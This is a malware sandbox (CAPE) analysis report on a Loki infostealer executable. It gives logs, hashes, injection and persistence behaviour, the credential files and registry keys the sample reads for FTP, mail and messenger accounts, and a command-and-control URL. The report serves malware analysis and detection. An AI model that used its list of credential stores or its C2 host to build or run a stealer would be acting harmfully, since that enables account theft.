CAPE

Detections

Loki


Triggered CAPE Tasks:

Task #25251: Extraction Task #25252: Injection

Analysis

Category Package Started Completed Duration Options Log
FILE exe 2018-12-04 01:29:53 2018-12-04 01:33:45 232 seconds Show Options Show Log
route = internet
procdump = 1
2018-12-04 01:29:55,000 [root] INFO: Date set to: 12-04-18, time set to: 01:29:55
2018-12-04 01:29:55,015 [root] DEBUG: Starting analyzer from: C:\wikhjvq
2018-12-04 01:29:55,015 [root] DEBUG: Storing results at: C:\waCDpW
2018-12-04 01:29:55,015 [root] DEBUG: Pipe server name: \\.\PIPE\nyAPbWFcLr
2018-12-04 01:29:55,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2018-12-04 01:29:55,015 [root] INFO: Automatically selected analysis package "exe"
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Browser
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Curtain
2018-12-04 01:29:55,312 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module DigiSig
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Disguise
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Human
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Screenshots
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Sysmon
2018-12-04 01:29:55,312 [root] DEBUG: Started auxiliary module Usage
2018-12-04 01:29:55,312 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2018-12-04 01:29:55,312 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2018-12-04 01:29:55,483 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\D1B132.exe" with arguments "" with pid 2912
2018-12-04 01:29:55,483 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:29:55,483 [lib.api.process] INFO: 32-bit DLL to inject is C:\wikhjvq\dll\kYJcQFY.dll, loader C:\wikhjvq\bin\iqfNdof.exe
2018-12-04 01:29:55,513 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2912
2018-12-04 01:29:57,526 [lib.api.process] INFO: Successfully resumed process with pid 2912
2018-12-04 01:29:57,526 [root] INFO: Added new process to list with pid: 2912
2018-12-04 01:29:57,542 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:29:57,542 [root] DEBUG: Process dumps enabled.
2018-12-04 01:29:57,619 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2912 at 0x748a0000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 01:29:57,619 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\D1B132.exe".
2018-12-04 01:29:57,619 [root] INFO: Monitor successfully loaded in process with pid 2912.
2018-12-04 01:29:58,415 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:20,365 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2018-12-04 01:30:20,395 [root] INFO: Announced 32-bit process name: stickiy.exe pid: 2332
2018-12-04 01:30:20,395 [root] INFO: Added new process to list with pid: 2332
2018-12-04 01:30:20,395 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:30:20,395 [lib.api.process] INFO: 32-bit DLL to inject is C:\wikhjvq\dll\kYJcQFY.dll, loader C:\wikhjvq\bin\iqfNdof.exe
2018-12-04 01:30:20,395 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2332
2018-12-04 01:30:20,395 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2912
2018-12-04 01:30:20,395 [root] DEBUG: GetHookCallerBase: thread 2916 (handle 0x0), return address 0x00374CD0, allocation base 0x00370000.
2018-12-04 01:30:20,395 [root] DEBUG: DumpInterestingRegions: Terminate caller base (0x00370000) different to imagebase (0x00400000) - dumping.
2018-12-04 01:30:20,395 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00370000.
2018-12-04 01:30:20,395 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:20,395 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:20,395 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:20,411 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2332 at 0x748a0000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 01:30:20,411 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\sticik\stickiy.exe".
2018-12-04 01:30:20,411 [root] INFO: Monitor successfully loaded in process with pid 2332.
2018-12-04 01:30:22,938 [modules.auxiliary.human] INFO: Found button "Close the program", clicking it
2018-12-04 01:30:25,029 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2018-12-04 01:30:26,933 [root] INFO: Process with pid 2912 has terminated
2018-12-04 01:30:43,562 [root] DEBUG: DLL unloaded from 0x00400000.
2018-12-04 01:30:43,562 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2018-12-04 01:30:43,562 [root] INFO: Announced 32-bit process name: stickiy.exe pid: 736
2018-12-04 01:30:43,562 [root] INFO: Added new process to list with pid: 736
2018-12-04 01:30:43,562 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:30:43,578 [lib.api.process] INFO: 32-bit DLL to inject is C:\wikhjvq\dll\kYJcQFY.dll, loader C:\wikhjvq\bin\iqfNdof.exe
2018-12-04 01:30:43,578 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 736
2018-12-04 01:30:43,608 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2332
2018-12-04 01:30:43,608 [root] DEBUG: GetHookCallerBase: thread 2380 (handle 0x0), return address 0x003F33DC, allocation base 0x003F0000.
2018-12-04 01:30:43,608 [root] DEBUG: DumpInterestingRegions: Terminate caller base (0x003F0000) different to imagebase (0x00400000) - dumping.
2018-12-04 01:30:43,608 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:43,608 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x003F0000.
2018-12-04 01:30:43,608 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:43,608 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:43,625 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 736 at 0x748a0000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 01:30:43,625 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\sticik\stickiy.exe".
2018-12-04 01:30:43,625 [root] INFO: Monitor successfully loaded in process with pid 736.
2018-12-04 01:30:43,625 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2018-12-04 01:30:43,655 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2018-12-04 01:30:43,655 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2018-12-04 01:30:43,812 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\vaultcli (0xc000 bytes).
2018-12-04 01:30:43,842 [root] DEBUG: DLL unloaded from 0x75C10000.
2018-12-04 01:30:43,921 [root] INFO: Announced starting service "VaultSvc"
2018-12-04 01:30:43,921 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2018-12-04 01:30:43,951 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2018-12-04 01:30:43,967 [lib.api.process] INFO: 64-bit DLL to inject is C:\wikhjvq\dll\VQvUBP.dll, loader C:\wikhjvq\bin\hxPAulke.exe
2018-12-04 01:30:43,983 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:43,983 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:44,029 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:44,062 [root] WARNING: Unable to place hook on LockResource
2018-12-04 01:30:44,062 [root] WARNING: Unable to hook LockResource
2018-12-04 01:30:44,092 [modules.auxiliary.human] INFO: Found button "Close the program", clicking it
2018-12-04 01:30:44,108 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000073CB0000, image base 0x00000000FFA10000, stack from 0x0000000002886000-0x0000000002890000
2018-12-04 01:30:44,124 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2018-12-04 01:30:44,124 [root] INFO: Added new process to list with pid: 460
2018-12-04 01:30:44,124 [root] INFO: Monitor successfully loaded in process with pid 460.
2018-12-04 01:30:44,982 [root] INFO: Announced 64-bit process name: lsass.exe pid: 1460
2018-12-04 01:30:44,982 [root] INFO: Added new process to list with pid: 1460
2018-12-04 01:30:44,982 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 01:30:44,997 [lib.api.process] INFO: 64-bit DLL to inject is C:\wikhjvq\dll\VQvUBP.dll, loader C:\wikhjvq\bin\hxPAulke.exe
2018-12-04 01:30:45,029 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1460
2018-12-04 01:30:45,059 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 01:30:45,059 [root] DEBUG: Process dumps enabled.
2018-12-04 01:30:45,075 [root] INFO: Disabling sleep skipping.
2018-12-04 01:30:45,091 [root] WARNING: Unable to place hook on LockResource
2018-12-04 01:30:45,107 [root] WARNING: Unable to hook LockResource
2018-12-04 01:30:45,107 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1460 at 0x0000000073CB0000, image base 0x00000000FF1A0000, stack from 0x00000000000E4000-0x00000000000F0000
2018-12-04 01:30:45,107 [root] DEBUG: Commandline: C:\Windows\sysnative\lsass.exe.
2018-12-04 01:30:45,107 [root] INFO: Monitor successfully loaded in process with pid 1460.
2018-12-04 01:30:46,183 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2018-12-04 01:30:47,213 [root] INFO: Process with pid 2332 has terminated
2018-12-04 01:31:15,089 [root] INFO: Notified of termination of process with pid 1460.
2018-12-04 01:31:15,417 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\profapi (0xb000 bytes).
2018-12-04 01:31:15,808 [root] INFO: Process with pid 1460 has terminated
2018-12-04 01:31:16,276 [root] DEBUG: DLL loaded at 0x74A60000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2018-12-04 01:31:16,290 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2018-12-04 01:31:16,290 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2018-12-04 01:31:16,306 [root] DEBUG: DLL loaded at 0x74A40000: C:\Windows\system32\netutils (0x9000 bytes).
2018-12-04 01:31:16,322 [root] DEBUG: DLL loaded at 0x74A20000: C:\Windows\system32\srvcli (0x19000 bytes).
2018-12-04 01:31:16,338 [root] DEBUG: DLL loaded at 0x74A00000: C:\Windows\system32\SAMLIB (0x12000 bytes).
2018-12-04 01:31:16,368 [root] DEBUG: DLL loaded at 0x74850000: C:\Windows\system32\USERENV (0x17000 bytes).
2018-12-04 01:31:16,400 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2018-12-04 01:31:16,400 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2018-12-04 01:31:16,431 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2018-12-04 01:31:16,447 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2018-12-04 01:31:16,463 [root] DEBUG: DLL loaded at 0x74830000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2018-12-04 01:31:16,477 [root] DEBUG: DLL loaded at 0x74960000: C:\Windows\system32\WINNSI (0x7000 bytes).
2018-12-04 01:31:16,711 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2018-12-04 01:31:16,775 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2018-12-04 01:31:16,789 [root] DEBUG: DLL loaded at 0x747D0000: C:\Windows\System32\wship6 (0x6000 bytes).
2018-12-04 01:31:18,849 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2018-12-04 01:33:29,655 [root] INFO: Analysis timeout hit, terminating analysis.
2018-12-04 01:33:29,655 [root] INFO: Created shutdown mutex.
2018-12-04 01:33:30,670 [root] INFO: Setting terminate event for process 736.
2018-12-04 01:33:30,670 [root] DEBUG: Terminate Event: Attempting to dump process 736
2018-12-04 01:33:30,670 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2018-12-04 01:33:30,670 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2018-12-04 01:33:30,670 [root] DEBUG: DumpProcess: Module entry point VA is 0x000139DE.
2018-12-04 01:33:30,684 [root] INFO: Added new CAPE file to list with path: C:\waCDpW\CAPE\736_20650930063033142122018
2018-12-04 01:33:30,684 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x9e000.
2018-12-04 01:33:31,184 [root] INFO: Shutting down package.
2018-12-04 01:33:31,184 [root] INFO: Stopping auxiliary modules.
2018-12-04 01:33:31,184 [root] INFO: Finishing auxiliary modules.
2018-12-04 01:33:31,184 [root] INFO: Shutting down pipe server and dumping dropped files.
2018-12-04 01:33:31,184 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2018-12-04 01:29:54 2018-12-04 01:33:45

File Details

File Name D1B132.exe
File Size 853504 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 518281e0a10098565f6a635ec103bfb2
SHA1 3757e2735ec4cedc2dcfc02a93b6e7eaa46c8356
SHA256 b8b6ee5387befd762ecce0e146bd0a6465239fa0785869f05fa58bdd25335d3e
SHA512 0ba8717834089091835393d963f153eb6828c8f355a440dc4bfed7b64ac1ddd34e5934b205946187796101dfcd14c1dd300a52c4e5052f2fe8b8b3498f5cfa3b
CRC32 42A578A1
Ssdeep 12288:aLNt0GIWI1BrDqqdlb0Z8qL8C0oCH67dOY7XGwJ4UNG3HuYAWEVULNio:ap2u+rw826SdT7XGwJ4UTcEVULUo
TrID
  • 35.5% (.EXE) Win32 Executable Delphi generic (14182/79/4)
  • 32.8% (.SCR) Windows screen saver (13101/52/3)
  • 11.2% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 5.1% (.EXE) Win16/32 Executable Delphi generic (2072/23)
  • 5.0% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 736 trigged the Yara rule 'HeavensGate'
Hit: PID 736 trigged the Yara rule 'Loki'
Creates RWX memory
A process attempted to delay the analysis task.
Process: stickiy.exe tried to sleep 741 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExA
DynamicLoader: oleaut32.dll/VariantChangeTypeEx
DynamicLoader: oleaut32.dll/VarNeg
DynamicLoader: oleaut32.dll/VarNot
DynamicLoader: oleaut32.dll/VarAdd
DynamicLoader: oleaut32.dll/VarSub
DynamicLoader: oleaut32.dll/VarMul
DynamicLoader: oleaut32.dll/VarDiv
DynamicLoader: oleaut32.dll/VarIdiv
DynamicLoader: oleaut32.dll/VarMod
DynamicLoader: oleaut32.dll/VarAnd
DynamicLoader: oleaut32.dll/VarOr
DynamicLoader: oleaut32.dll/VarXor
DynamicLoader: oleaut32.dll/VarCmp
DynamicLoader: oleaut32.dll/VarI4FromStr
DynamicLoader: oleaut32.dll/VarR4FromStr
DynamicLoader: oleaut32.dll/VarR8FromStr
DynamicLoader: oleaut32.dll/VarDateFromStr
DynamicLoader: oleaut32.dll/VarCyFromStr
DynamicLoader: oleaut32.dll/VarBoolFromStr
DynamicLoader: oleaut32.dll/VarBstrFromCy
DynamicLoader: oleaut32.dll/VarBstrFromDate
DynamicLoader: oleaut32.dll/VarBstrFromBool
DynamicLoader: user32.dll/GetMonitorInfoA
DynamicLoader: user32.dll/GetSystemMetrics
DynamicLoader: user32.dll/EnumDisplayMonitors
DynamicLoader: user32.dll/AnimateWindow
DynamicLoader: comctl32.dll/InitializeFlatSB
DynamicLoader: comctl32.dll/UninitializeFlatSB
DynamicLoader: comctl32.dll/FlatSB_GetScrollProp
DynamicLoader: comctl32.dll/FlatSB_SetScrollProp
DynamicLoader: comctl32.dll/FlatSB_EnableScrollBar
DynamicLoader: comctl32.dll/FlatSB_ShowScrollBar
DynamicLoader: comctl32.dll/FlatSB_GetScrollRange
DynamicLoader: comctl32.dll/FlatSB_GetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_GetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollPos
DynamicLoader: comctl32.dll/FlatSB_SetScrollInfo
DynamicLoader: comctl32.dll/FlatSB_SetScrollRange
DynamicLoader: user32.dll/SetLayeredWindowAttributes
DynamicLoader: stickiy.exe/drfHLq2P0PBsf1fnYpfqu
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultEnumerateVaults
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
DynamicLoader: NETAPI32.DLL/NetUserGetInfo
Drops a binary and executes it
binary: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
http_version_old: HTTP traffic uses version 1.0
suspicious_request: http://decvit.ga/and/cat.php
Performs some HTTP requests
url: http://decvit.ga/and/cat.php
The binary likely contains encrypted or compressed data.
section: name: .rsrc, entropy: 6.95, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00032a00, virtual_size: 0x000329bc
Behavioural detection: Injection (Process Hollowing)
Injection: stickiy.exe(2332) -> stickiy.exe(736)
Executed a process and injected code into it, probably while unpacking
Injection: stickiy.exe(2332) -> stickiy.exe(736)
Behavioural detection: Injection (inter-process)
Installs itself for autorun at Windows startup
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
Creates a hidden or system file
file: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
file: C:\Users\user\AppData\Roaming\24CFE6
Creates a copy of itself
copy: C:\Users\user\AppData\Roaming\sticik\stickiy.exe
copy: C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
Harvests credentials from local FTP client softwares
file: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
file: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
file: C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file: C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
file: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Harvests information related to installed instant messenger clients
file: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Harvests information related to installed mail clients
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f4ef05d8e05bfb4584a20de2c515cad6\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Attempts to interact with an Alternate Data Stream (ADS)
file: C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
Collects information to fingerprint the system
Anomalous binary characteristics
anomaly: Timestamp on binary predates the release date of the OS version it requires by at least a year

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 199.192.27.109 [VT] United States

DNS

Name Response Post-Analysis Lookup
decvit.ga [VT] A 199.192.27.109 [VT]

Summary

C:\Users\user\AppData\Local\Temp\D1B132.ENG
C:\Users\user\AppData\Local\Temp\D1B132.ENG.DLL
C:\Users\user\AppData\Local\Temp\D1B132.EN
C:\Users\user\AppData\Local\Temp\D1B132.EN.DLL
C:\Users\user\AppData\Roaming\sticik
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
